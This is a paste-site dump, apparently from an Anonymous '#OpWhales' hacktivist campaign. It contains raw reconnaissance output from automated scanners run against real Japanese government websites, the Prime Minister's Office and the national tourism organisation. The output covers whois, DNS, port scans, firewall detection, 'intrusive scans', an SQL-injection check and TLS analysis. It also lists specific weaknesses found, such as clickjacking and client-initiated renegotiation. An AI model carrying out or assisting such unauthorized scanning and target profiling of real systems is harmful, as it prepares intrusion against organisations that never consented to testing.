
Anonymous V.S BlackHat #OpWhales JTSEC full Recon #2

a guest
Jan 8th, 2018
  1. #######################################################################################################################################
  2. Hostname www.kantei.go.jp ISP Unknown
  3. Continent Unknown Flag
  4. JP
  5. Country Japan Country Code JP
  6. Region Unknown Local time 08 Jan 2018 23:59 JST
  7. City Unknown Latitude 36
  8. IP Address (IPv6) 2001:240:1e00:1021::10 Longitude 138
  9. #######################################################################################################################################
  10. [i] Scanning Site: http://kantei.go.jp
  11.  
  12.  
  13.  
  14. B A S I C I N F O
  15. ====================
  16.  
  17.  
  18. [+] Site Title: 首相官邸ホームページ
  19. [+] IP address: 202.214.194.138
  20. [+] Web Server: Could Not Detect
  21. [+] CMS: Could Not Detect
  22. [+] Cloudflare: Not Detected
  23. [+] Robots File: Could NOT Find robots.txt!
  24.  
  25.  
  26.  
  27.  
  28. W H O I S L O O K U P
  29. ========================
  30.  
  31. [ JPRS database provides information on network administration. Its use is ]
  32. [ restricted to network administration purposes. For further information, ]
  33. [ use 'whois -h whois.jprs.jp help'. To suppress Japanese output, add'/e' ]
  34. [ at the end of command, e.g. 'whois -h whois.jprs.jp xxx/e'. ]
  35.  
  36. Domain Information:
  37. a. [Domain Name] KANTEI.GO.JP
  38. g. [Organization] The Prime Minister's Official Residence
  39. l. [Organization Type] Government
  40. m. [Administrative Contact] MK072JP
  41. n. [Technical Contact] KW15930JP
  42. p. [Name Server] ns7.kantei.go.jp
  43. p. [Name Server] ns8.kantei.go.jp
  44. s. [Signing Key]
  45. [State] Connected (2018/06/30)
  46. [Registered Date] 1994/06/24
  47. [Connected Date] 1994/06/27
  48. [Last Update] 2017/09/22 14:02:03 (JST)
  49.  
  50.  
  51.  
  52.  
  53.  
  54. G E O I P L O O K U P
  55. =========================
  56.  
  57. [i] IP Address: 202.214.216.10
  58. [i] Country: JP
  59. [i] State: Hyogo
  60. [i] City: Kobe
  61. [i] Latitude: 34.691299
  62. [i] Longitude: 135.182999
  63.  
  64.  
  65.  
  66.  
  67. H T T P H E A D E R S
  68. =======================
  69.  
  70.  
  71. [i] HTTP/1.1 302 Found
  72. [i] Date: Mon, 08 Jan 2018 15:03:34 GMT
  73. [i] X-Frame-Options: SAMEORIGIN
  74. [i] Location: http://www.kantei.go.jp/
  75. [i] Content-Length: 208
  76. [i] Connection: close
  77. [i] Content-Type: text/html; charset=iso-8859-1
  78. [i] HTTP/1.1 200 OK
  79. [i] Date: Mon, 08 Jan 2018 15:03:35 GMT
  80. [i] X-Frame-Options: SAMEORIGIN
  81. [i] Last-Modified: Fri, 05 Jan 2018 11:56:43 GMT
  82. [i] ETag: "6eda-562062461913e"
  83. [i] Accept-Ranges: bytes
  84. [i] Content-Length: 29175
  85. [i] Cache-Control: no-cache
  86. [i] Expires: Mon, 08 Jan 2018 15:03:35 GMT
  87. [i] Pragma: no-cache
  88. [i] Connection: close
  89. [i] Content-Type: text/html
  90.  
  91.  
  92.  
  93.  
  94. D N S L O O K U P
  95. ===================
  96.  
  97. kantei.go.jp. 3599 IN SOA ns7.kantei.go.jp. kantei-postmaster.iij-pj.jp. 2017121304 3600 1200 604800 3600
  98. kantei.go.jp. 299 IN NS ns7.kantei.go.jp.
  99. kantei.go.jp. 299 IN NS ns8.kantei.go.jp.
  100. kantei.go.jp. 29 IN A 202.214.194.138
  101. kantei.go.jp. 299 IN MX 10 mx.securemx.jp.
  102. kantei.go.jp. 299 IN MX 60 mx6.securemx.jp.
  103. kantei.go.jp. 299 IN TXT "v=spf1 include:spf.securemx.jp +ip4:202.214.194.178 +ip4:202.214.216.50 +ip6:2001:0240:1e00:0f21::178 +ip6:2001:0240:1e00:1021::50 -all"
  104. kantei.go.jp. 29 IN AAAA 2001:240:1e00:f21::138
  105.  
  106.  
  107.  
  108.  
  109. S U B N E T C A L C U L A T I O N
  110. ====================================
  111.  
  112. Address = 2001:240:1e00:f21::138
  113. Network = 2001:240:1e00:f21::138 / 128
  114. Netmask = ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
  115. Wildcard Mask = ::
  116. Hosts Bits = 0
  117. Max. Hosts = 0 (2^0 - 1)
  118. Host Range = { 2001:240:1e00:f21::139 - 2001:240:1e00:f21::138 }
  119.  
  120.  
  121.  
  122. N M A P P O R T S C A N
  123. ============================
  124.  
  125.  
  126. Starting Nmap 7.01 ( https://nmap.org ) at 2018-01-08 15:03 UTC
  127. Nmap scan report for kantei.go.jp (202.214.216.10)
  128. Host is up (0.18s latency).
  129. Other addresses for kantei.go.jp (not scanned): 2001:240:1e00:f21::138
  130. PORT STATE SERVICE VERSION
  131. 21/tcp filtered ftp
  132. 22/tcp filtered ssh
  133. 23/tcp filtered telnet
  134. 25/tcp filtered smtp
  135. 80/tcp open http?
  136. 110/tcp filtered pop3
  137. 143/tcp filtered imap
  138. 443/tcp open ssl/https?
  139. 445/tcp filtered microsoft-ds
  140. 3389/tcp filtered ms-wbt-server
  141. 2 services unrecognized despite returning data. If you know the service/version, please submit
  142. [!] IP Address : 202.214.216.10
  143. [!] www.kantei.go.jp doesn't seem to use a CMS
  144. [+] Honeypot Probabilty: 0%
  145. ----------------------------------------
  146. PORT STATE SERVICE VERSION
  147. 21/tcp filtered ftp
  148. 22/tcp filtered ssh
  149. 23/tcp filtered telnet
  150. 25/tcp filtered smtp
  151. 80/tcp open http?
  152. 110/tcp filtered pop3
  153. 143/tcp filtered imap
  154. 443/tcp open ssl/https?
  155. 445/tcp filtered microsoft-ds
  156. 3389/tcp filtered ms-wbt-server
  157.  
  158.  
  159. [+] DNS Records
  160.  
  161. [+] Host Records (A)
  162. www.kantei.go.jp (202.214.194.138) AS2497 Internet Initiative Inc. Japan
  163.  
  164. [+] TXT Records
  165.  
  166. [+] DNS Map: https://dnsdumpster.com/static/map/kantei.go.jp.png
  167.  
  168. [>] Initiating 3 intel modules
  169. [>] Loading Alpha module (1/3)
  170. [>] Beta module deployed (2/3)
  171. [>] Gamma module initiated (3/3)
  172. No emails found
  173. No hosts found
  174. [+] Virtual hosts:
  175. -----------------
  176. [>] Crawling the target for fuzzable URLs
  177. [+] Found 1 fuzzable URLs
  178. http://www.kantei.go.jp////nettv.gov-online.go.jp/channel.php?c=01
  179. [>] Using SQLMap api to check for SQL injection vulnerabilities. Don't
  180. worry we are using an online service and it doesn't depend on your internet connection.
  181. This scan will take 2-3 minutes.
  182. [-] None of parameters is vulnerable to SQL injection
  183. [+] These are the URLs having parameters:
  184. http://www.kantei.go.jp////nettv.gov-online.go.jp/channel.php?c=01
  185. ====================================================================================
  186. RUNNING NSLOOKUP
  187. ====================================================================================
  188. ** server can't find 138.194.214.202.in-addr.arpa: NXDOMAIN
  189.  
  190. Host 138.194.214.202.in-addr.arpa. not found: 3(NXDOMAIN)
  191. ====================================================================================
  192. CHECKING OS FINGERPRINT
  193. ====================================================================================
  194.  
  195. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  196.  
  197. [+] Target is 202.214.194.138
  198. [+] Loading modules.
  199. [+] Following modules are loaded:
  200. [x] [1] ping:icmp_ping - ICMP echo discovery module
  201. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  202. [x] [3] ping:udp_ping - UDP-based ping discovery module
  203. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  204. [x] [5] infogather:portscan - TCP and UDP PortScanner
  205. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  206. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  207. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  208. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  209. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  210. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  211. [x] [12] fingerprint:smb - SMB fingerprinting module
  212. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  213. [+] 13 modules registered
  214. [+] Initializing scan engine
  215. [+] Running scan engine
  216. [-] ping:tcp_ping module: no closed/open TCP ports known on 202.214.194.138. Module test failed
  217. [-] ping:udp_ping module: no closed/open UDP ports known on 202.214.194.138. Module test failed
  218. [-] No distance calculation. 202.214.194.138 appears to be dead or no ports known
  219. [+] Host: 202.214.194.138 is down (Guess probability: 0%)
  220. [+] Cleaning up scan engine
  221. [+] Modules deinitialized
  222. [+] Execution completed.
  223.  
  224. ====================================================================================
  225. PINGING HOST
  226. ====================================================================================
  227. PING 202.214.194.138 (202.214.194.138) 56(84) bytes of data.
  228.  
  229. --- 202.214.194.138 ping statistics ---
  230. 1 packets transmitted, 0 received, 100% packet loss, time 0ms
  231.  
  232.  
  233. ====================================================================================
  234. RUNNING TCP PORT SCAN
  235. ====================================================================================
  236.  
  237. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 10:22 EST
  238. Nmap scan report for 202.214.194.138
  239. Host is up (0.40s latency).
  240. Not shown: 471 filtered ports
  241. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  242. PORT STATE SERVICE
  243. 80/tcp open http
  244. 443/tcp open https
  245.  
  246. Nmap done: 1 IP address (1 host up) scanned in 164.02 seconds
  247.  
  248. ====================================================================================
  249. RUNNING INTRUSIVE SCANS
  250. ====================================================================================
  251. + -- --=[Port 21 closed... skipping.
  252. + -- --=[Port 22 closed... skipping.
  253. + -- --=[Port 23 closed... skipping.
  254. + -- --=[Port 25 closed... skipping.
  255. + -- --=[Port 53 closed... skipping.
  256. + -- --=[Port 79 closed... skipping.
  257. + -- --=[Port 80 opened... running tests...
  258. ====================================================================================
  259. CHECKING FOR WAF
  260. ====================================================================================
  261.  
  269.  
  270. WAFW00F - Web Application Firewall Detection Tool
  271.  
  272. By Sandro Gauci && Wendel G. Henrique
  273.  
  274. Checking http://202.214.194.138
  275. Generic Detection results:
  276. The site http://202.214.194.138 seems to be behind a WAF or some sort of security solution
  277. Reason: Blocking is being done at connection/packet level.
  278. Number of requests: 9
  279.  
  280. ====================================================================================
  281. GATHERING HTTP INFO
  282. ====================================================================================
  283. http://202.214.194.138 [200 OK] Cookies[RAFP_UID,TS01791bf6], Country[JAPAN][JP], IP[202.214.194.138], JQuery[1.8.3], Script[text/javascript], Title[首相官邸ホームページ], X-Frame-Options[SAMEORIGIN]
  284.  
  290.  
  291. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  292. + -- --=[Target: 202.214.194.138:80
  293. + -- --=[Site not vulnerable to Cross-Site Tracing!
  294. + -- --=[Site not vulnerable to Host Header Injection!
  295. + -- --=[Site vulnerable to Cross-Frame Scripting!
  296. + -- --=[Site vulnerable to Clickjacking!
  297.  
  298. HTTP/1.1 200 OK
  299. Cache-Control: no-cache
  300. Connection: close
  301. Content-Type: text/html; charset=utf-8
  302. Pragma: no-cache
  303. Content-Length: 80
  304.  
  305. <html><head><title>Request Error</title></head><body>Request Error</body></html>
  306.  
  307.  
  308.  
  309.  
  310. ====================================================================================
  311. CHECKING HTTP HEADERS
  312. ====================================================================================
  313. + -- --=[Checking if X-Content options are enabled on 202.214.194.138...
  314.  
  315. + -- --=[Checking if X-Frame options are enabled on 202.214.194.138...
  316. X-Frame-Options: SAMEORIGIN
  317.  
  318. + -- --=[Checking if X-XSS-Protection header is enabled on 202.214.194.138...
  319.  
  320. + -- --=[Checking HTTP methods on 202.214.194.138...
  321. HTTP/1.1 405 Method Not Allowed
  322. Allow:
  323.  
  324. + -- --=[Checking if TRACE method is enabled on 202.214.194.138...
  325.  
  326. + -- --=[Checking for META tags on 202.214.194.138...
  327. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  328. <meta http-equiv="Content-Style-Type" content="text/css" />
  329. <meta http-equiv="Content-Script-Type" content="text/javascript" />
  330. <meta name="description" content="首相官邸のホームページです。内閣や総理大臣に関する情報をご覧になれます。" />
  331. <meta name="keywords" content="首相官邸,政府,内閣,総理,内閣官房" />
  332. <meta name="viewport" content="width=device-width, user-scalable=yes, initial-scale=1.0,target-densitydpi=device-dpi" />
  333. <meta name="format-detection" content="telephone=no" />
  334.  
  335. + -- --=[Checking for open proxy on 202.214.194.138...
  336. /* WITH FIRST PARTY COOKIE */
  337. (function() {
  338. var bi = document.createElement('script');bi.type = 'text/javascript'; bi.async = true;
  339. bi.src = '//cs.nakanohito.jp/b3/bi.js';
  340. var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(bi, s);
  341. })();
  342. </script>
  343. <!-- User Insight PCDF Code End : kantei.go.jp -->
  344. </body>
  345. </html>
  346. + -- --=[Enumerating software on 202.214.194.138...
  347.  
  348. + -- --=[Checking if Strict-Transport-Security is enabled on 202.214.194.138...
  349.  
  350. + -- --=[Checking for Flash cross-domain policy on 202.214.194.138...
  351. Please try again from the top page. Thank you for your understanding. <br />
  352. <br />
  353. &nbsp;&nbsp;<img src="/error/contents_rmark.gif" alt="" width="7" height="6" border="0"> <a href="/foreign/index-e.html">Prime Minister of Japan and His Cabinet Top Page (PC site only)</a>
  354. <br />
  355. </td>
  356. </tr>
  357. </table>
  358. <!-- /コンテンツ-->
  359. </BODY>
  360. </HTML>
  361.  
  362. + -- --=[Checking for Silverlight cross-domain policy on 202.214.194.138...
  363. Please try again from the top page. Thank you for your understanding. <br />
  364. <br />
  365. &nbsp;&nbsp;<img src="/error/contents_rmark.gif" alt="" width="7" height="6" border="0"> <a href="/foreign/index-e.html">Prime Minister of Japan and His Cabinet Top Page (PC site only)</a>
  366. <br />
  367. </td>
  368. </tr>
  369. </table>
  370. <!-- /コンテンツ-->
  371. </BODY>
  372. </HTML>
  373.  
  374. + -- --=[Checking for HTML5 cross-origin resource sharing on 202.214.194.138...
  375.  
  376. + -- --=[Retrieving robots.txt on 202.214.194.138...
  377. Please try again from the top page. Thank you for your understanding. <br />
  378. <br />
  379. &nbsp;&nbsp;<img src="/error/contents_rmark.gif" alt="" width="7" height="6" border="0"> <a href="/foreign/index-e.html">Prime Minister of Japan and His Cabinet Top Page (PC site only)</a>
  380. <br />
  381. </td>
  382. </tr>
  383. </table>
  384. <!-- /コンテンツ-->
  385. </BODY>
  386. </HTML>
  387.  
  388. + -- --=[Retrieving sitemap.xml on 202.214.194.138...
  389. Please try again from the top page. Thank you for your understanding. <br />
  390. <br />
  391. &nbsp;&nbsp;<img src="/error/contents_rmark.gif" alt="" width="7" height="6" border="0"> <a href="/foreign/index-e.html">Prime Minister of Japan and His Cabinet Top Page (PC site only)</a>
  392. <br />
  393. </td>
  394. </tr>
  395. </table>
  396. <!-- /コンテンツ-->
  397. </BODY>
  398. </HTML>
  399.  
  400. + -- --=[Checking cookie attributes on 202.214.194.138...
  401.  
  402. + -- --=[Checking for ASP.NET Detailed Errors on 202.214.194.138...
  403. <td><img src="/error/line_b.gif" alt="" width="100%" height="8"></td></tr>
  404. &nbsp;&nbsp;<img src="/error/contents_rmark.gif" alt="" width="7" height="6" border="0"> <a href="/foreign/index-e.html">Prime Minister of Japan and His Cabinet Top Page (PC site only)</a>
  405. Fichier binaire (entrée standard) correspondant
  406. <td><img src="/error/line_b.gif" alt="" width="100%" height="8"></td></tr>
  407. &nbsp;&nbsp;<img src="/error/contents_rmark.gif" alt="" width="7" height="6" border="0"> <a href="/foreign/index-e.html">Prime Minister of Japan and His Cabinet Top Page (PC site only)</a>
  408. Fichier binaire (entrée standard) correspondant
  409.  
  410.  
  411. ====================================================================================
  412. SAVING SCREENSHOTS
  413. ====================================================================================
  414. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/202.214.194.138-port80.jpg
  415. libpng warning: iCCP: known incorrect sRGB profile
  416. libpng warning: iCCP: known incorrect sRGB profile
  417. + -- --=[Port 110 closed... skipping.
  418. + -- --=[Port 111 closed... skipping.
  419. + -- --=[Port 135 closed... skipping.
  420. + -- --=[Port 139 closed... skipping.
  421. + -- --=[Port 161 closed... skipping.
  422. + -- --=[Port 162 closed... skipping.
  423. + -- --=[Port 389 closed... skipping.
  424. + -- --=[Port 443 opened... running tests...
  425. ====================================================================================
  426. CHECKING FOR WAF
  427. ====================================================================================
  428.  
  436.  
  437. WAFW00F - Web Application Firewall Detection Tool
  438.  
  439. By Sandro Gauci && Wendel G. Henrique
  440.  
  441. Checking https://202.214.194.138
  442. ERROR:root:Site https://202.214.194.138 appears to be down
  443.  
  444. ====================================================================================
  445. GATHERING HTTP INFO
  446. ====================================================================================
  447. https://202.214.194.138 [200 OK] Cookies[RAFP_UID,TS01791bf6], Country[JAPAN][JP], IP[202.214.194.138], JQuery[1.8.3], Script[text/javascript], Title[首相官邸ホームページ], X-Frame-Options[SAMEORIGIN]
  448.  
  449. ====================================================================================
  450. GATHERING SSL/TLS INFO
  451. ====================================================================================
  452.  
  453.  
  454.  
  455. AVAILABLE PLUGINS
  456. -----------------
  457.  
  458. PluginHSTS
  459. PluginOpenSSLCipherSuites
  460. PluginCertInfo
  461. PluginSessionRenegotiation
  462. PluginCompression
  463. PluginChromeSha1Deprecation
  464. PluginSessionResumption
  465. PluginHeartbleed
  466.  
  467.  
  468.  
  469. CHECKING HOST(S) AVAILABILITY
  470. -----------------------------
  471.  
  472. 202.214.194.138:443 => 202.214.194.138:443
  473.  
  474.  
  475.  
  476. SCAN RESULTS FOR 202.214.194.138:443 - 202.214.194.138:443
  477. ----------------------------------------------------------
  478.  
  479. * Deflate Compression:
  480. OK - Compression disabled
  481.  
  482. * Session Renegotiation:
  483. Client-initiated Renegotiations: VULNERABLE - Server honors client-initiated renegotiations
  484. Secure Renegotiation: OK - Supported
  485.  
  486. * Certificate - Content:
  487. SHA1 Fingerprint: 41ec0365b4607d31f4f7776ada93bd2f2002ed43
  488. Common Name: *.kantei.go.jp
  489. Issuer: GlobalSign Organization Validation CA - SHA256 - G2
  490. Serial Number: 4664B1F3CCB0E3E36A0606E6
  491. Not Before: Aug 30 06:47:00 2017 GMT
  492. Not After: Aug 31 06:47:00 2019 GMT
  493. Signature Algorithm: sha256WithRSAEncryption
  494. Public Key Algorithm: rsaEncryption
  495. Key Size: 2048 bit
  496. Exponent: 65537 (0x10001)
  497. X509v3 Subject Alternative Name: {'DNS': ['*.kantei.go.jp', 'kantei.go.jp']}
  498.  
  499. * Certificate - Trust:
  500. Hostname Validation: FAILED - Certificate does NOT match 202.214.194.138
  501. Google CA Store (09/2015): OK - Certificate is trusted
  502. Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: certificate has expired
  503. Microsoft CA Store (09/2015): OK - Certificate is trusted
  504. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  505. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  506. Certificate Chain Received: ['*.kantei.go.jp', 'GlobalSign Organization Validation CA - SHA256 - G2']
  507.  
  508. * Certificate - OCSP Stapling:
  509. NOT SUPPORTED - Server did not send back an OCSP response.
  510.  
  511. * SSLV2 Cipher Suites:
  512. Server rejected all cipher suites.
  513.  
  514. * Session Resumption:
  515. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  516. With TLS Session Tickets: NOT SUPPORTED - TLS ticket not assigned.
  517.  
  518. * SSLV3 Cipher Suites:
  519. Server rejected all cipher suites.
  520.  
  521.  
  522.  
  523. SCAN COMPLETED IN 10.18 S
  524. -------------------------
  525. Version: 1.11.10-static
  526. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  527.  
  528. Testing SSL server 202.214.194.138 on port 443 using SNI name 202.214.194.138
  529.  
  530. TLS Fallback SCSV:
  531. Server supports TLS Fallback SCSV
  532.  
  533. TLS renegotiation:
  534. Secure session renegotiation supported
  535.  
  536. TLS Compression:
  537. Compression disabled
  538.  
  539. Heartbleed:
  540. TLS 1.2 not vulnerable to heartbleed
  541. TLS 1.1 not vulnerable to heartbleed
  542. TLS 1.0 not vulnerable to heartbleed
  543.  
  544. Supported Server Cipher(s):
  545. Preferred TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 1024 bits
  546. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 1024 bits
  547. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 1024 bits
  548. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  549. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 1024 bits
  550. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  551. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  552. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  553. Accepted TLSv1.2 256 bits AES256-SHA256
  554. Accepted TLSv1.2 256 bits AES256-SHA
  555. Accepted TLSv1.2 128 bits AES128-SHA256
  556. Accepted TLSv1.2 128 bits AES128-SHA
  557. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  558. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  559. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  560. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  561. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  562. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  563. Preferred TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  564. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  565. Accepted TLSv1.1 256 bits AES256-SHA
  566. Accepted TLSv1.1 128 bits AES128-SHA
  567. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  568. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  569. Preferred TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  570. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  571. Accepted TLSv1.0 256 bits AES256-SHA
  572. Accepted TLSv1.0 128 bits AES128-SHA
  573. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  574. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  575.  
  576. SSL Certificate:
  577. Signature Algorithm: sha256WithRSAEncryption
  578. RSA Key Strength: 2048
  579.  
  580. Subject: *.kantei.go.jp
  581. Altnames: DNS:*.kantei.go.jp, DNS:kantei.go.jp
  582. Issuer: GlobalSign Organization Validation CA - SHA256 - G2
  583.  
  584. Not valid before: Aug 30 06:47:00 2017 GMT
  585. Not valid after: Aug 31 06:47:00 2019 GMT
  586. #######################################################################################################################################
  587. Hostname www.jnto.go.jp ISP J-Stream Inc. (AS24253)
  588. Continent Asia Flag
  589. JP
  590. Country Japan Country Code JP (JPN)
  591. Region 19 Local time 09 Jan 2018 00:39 JST
  592. Metropolis Unknown Postal Code 210-0835
  593. City Kawasaki Latitude 35.521
  594. IP Address 202.79.244.228 Longitude 139.717
  595. #######################################################################################################################################
  596. [i] Scanning Site: http://202.79.244.228 #
  597.  
  598.  
  599.  
  600. B A S I C I N F O
  601. ====================
  602.  
  603.  
  604. [+] Site Title: Japan National Tourism Organization Web Site
  605. [+] IP address: 202.79.244.228
  606. [+] Web Server: Apache
  607. [+] CMS: Could Not Detect
  608. [+] Cloudflare: Not Detected
  609. [+] Robots File: Found
  610.  
  611. -------------[ contents ]----------------
  612. User-agent: bingbot
  613. Crawl-Delay: 5
  614.  
  615. User-agent: AhrefsBot
  616. Disallow: /
  617.  
  618. User-agent: BLEXBot
  619. Disallow: /
  620. -----------[end of contents]-------------
  621.  
  622.  
  623.  
  624. W H O I S L O O K U P
  625. ========================
  626.  
  627. % [whois.apnic.net]
  628. % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
  629.  
  630. % Information related to '202.79.240.0 - 202.79.247.255'
  631.  
  632. % Abuse contact for '202.79.240.0 - 202.79.247.255' is 'hostmaster@nic.ad.jp'
  633.  
  634. inetnum: 202.79.240.0 - 202.79.247.255
  635. netname: J-Stream
  636. descr: J-Stream Inc.
  637. descr: Shiba 256 Square Bldg. 6F, 2-5-6 Shiba,
  638. descr: Minato-ku, Tokyo, 105-0014 JAPAN
  639. country: JP
  640. admin-c: JNIC1-AP
  641. tech-c: JNIC1-AP
  642. status: ALLOCATED PORTABLE
  643. remarks: Email address for spam or abuse complaints : abuse@stream.co.jp
  644. mnt-by: MAINT-JPNIC
  645. mnt-irt: IRT-JPNIC-JP
  646. mnt-lower: MAINT-JPNIC
  647. last-modified: 2015-12-01T22:30:08Z
  648. source: APNIC
  649.  
  650. irt: IRT-JPNIC-JP
  651. address: Urbannet-Kanda Bldg 4F, 3-6-2 Uchi-Kanda
  652. address: Chiyoda-ku, Tokyo 101-0047, Japan
  653. e-mail: hostmaster@nic.ad.jp
  654. abuse-mailbox: hostmaster@nic.ad.jp
  655. admin-c: JNIC1-AP
  656. tech-c: JNIC1-AP
  657. auth: # Filtered
  658. mnt-by: MAINT-JPNIC
  659. last-modified: 2017-10-18T10:21:54Z
  660. source: APNIC
  661.  
  662. role: Japan Network Information Center
  663. address: Urbannet-Kanda Bldg 4F
  664. address: 3-6-2 Uchi-Kanda
  665. address: Chiyoda-ku, Tokyo 101-0047,Japan
  666. country: JP
  667. phone: +81-3-5297-2311
  668. fax-no: +81-3-5297-2312
  669. e-mail: hostmaster@nic.ad.jp
  670. admin-c: JI13-AP
  671. tech-c: JE53-AP
  672. nic-hdl: JNIC1-AP
  673. mnt-by: MAINT-JPNIC
  674. last-modified: 2012-08-28T07:58:02Z
  675. source: APNIC
  676.  
  677. % Information related to '202.79.240.0 - 202.79.247.255'
  678.  
  679. inetnum: 202.79.240.0 - 202.79.247.255
  680. netname: J-Stream-CIDR-BLK-JP
  681. descr: J-Stream Inc.
  682. remarks: Email address for spam or abuse complaints : abuse@stream.co.jp
  683. country: JP
  684. admin-c: SM3560JP
  685. tech-c: SM3560JP
  686. remarks: This information has been partially mirrored by APNIC from
  687. remarks: JPNIC. To obtain more specific information, please use the
  688. remarks: JPNIC WHOIS Gateway at
  689. remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or
  690. remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client
  691. remarks: defaults to Japanese output, use the /e switch for English
  692. remarks: output)
  693. changed: apnic-ftp@nic.ad.jp 20050124
  694. changed: apnic-ftp@nic.ad.jp 20101019
  695. source: JPNIC
  696.  
  697. % This query was served by the APNIC Whois Service version 1.88.15-43 (WHOIS-US3)
  698.  
  699.  
  700.  
  701.  
  702.  
  703.  
  704. G E O I P L O O K U P
  705. =========================
  706.  
  707. [i] IP Address: 202.79.244.228
  708. [i] Country: JP
  709. [i] State: Tokyo
  710. [i] City: Tokyo
  711. [i] Latitude: 35.685001
  712. [i] Longitude: 139.751404
  713.  
  714.  
  715.  
  716.  
  717. H T T P H E A D E R S
  718. =======================
  719.  
  720.  
  721. [i] HTTP/1.1 200 OK
  722. [i] Date: Mon, 08 Jan 2018 15:42:47 GMT
  723. [i] Server: Apache
  724. [i] Last-Modified: Tue, 06 Jun 2017 07:28:20 GMT
  725. [i] ETag: "1e2e-55145905a8d00"
  726. [i] Accept-Ranges: bytes
  727. [i] Content-Length: 7726
  728. [i] Connection: close
  729. [i] Content-Type: text/html
  730.  
  731.  
  732.  
  733.  
  734. D N S L O O K U P
  735. ===================
  736.  
  737. no records found
  738.  
  739.  
  740.  
  741. S U B N E T C A L C U L A T I O N
  742. ====================================
  743.  
  744. Address = 202.79.244.228
  745. Network = 202.79.244.228 / 32
  746. Netmask = 255.255.255.255
  747. Broadcast = not needed on Point-to-Point links
  748. Wildcard Mask = 0.0.0.0
  749. Hosts Bits = 0
  750. Max. Hosts = 1 (2^0 - 0)
  751. Host Range = { 202.79.244.228 - 202.79.244.228 }
  752.  
  753.  
  754.  
  755. N M A P P O R T S C A N
  756. ============================
  757.  
  758.  
  759. Starting Nmap 7.01 ( https://nmap.org ) at 2018-01-08 15:42 UTC
  760. Nmap scan report for bbt244-jnto-web01-228.jnto.go.jp (202.79.244.228)
  761. Host is up (0.16s latency).
  762. PORT STATE SERVICE VERSION
  763. 21/tcp filtered ftp
  764. 22/tcp filtered ssh
  765. 23/tcp filtered telnet
  766. 25/tcp filtered smtp
  767. 80/tcp open http Apache httpd
  768. 110/tcp filtered pop3
  769. 143/tcp filtered imap
  770. 443/tcp open ssl/http Apache httpd
  771. 445/tcp filtered microsoft-ds
  772. 3389/tcp filtered ms-wbt-server
  773.  
  774. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  775. Nmap done: 1 IP address (1 host up) scanned in 16.45 seconds
  776.  
  777. [?] Enter the target: http://202.79.244.228
  778. [!] IP Address : 202.79.244.228
  779. [!] Server: Apache
  780. [-] Clickjacking protection is not in place.
  781. [!] 202.79.244.228 doesn't seem to use a CMS
  782. [+] Honeypot Probabilty: 0%
  783. ----------------------------------------
  784. [+] Robots.txt retrieved
  785. User-agent: bingbot
  786. Crawl-Delay: 5
  787.  
  788. User-agent: AhrefsBot
  789. Disallow: /
  790.  
  791. User-agent: BLEXBot
  792. Disallow: /
  793. ----------------------------------------
  794. PORT STATE SERVICE VERSION
  795. 21/tcp filtered ftp
  796. 22/tcp filtered ssh
  797. 23/tcp filtered telnet
  798. 25/tcp filtered smtp
  799. 80/tcp open http Apache httpd
  800. 110/tcp filtered pop3
  801. 143/tcp filtered imap
  802. 443/tcp open ssl/http Apache httpd
  803. 445/tcp filtered microsoft-ds
  804. 3389/tcp filtered ms-wbt-server
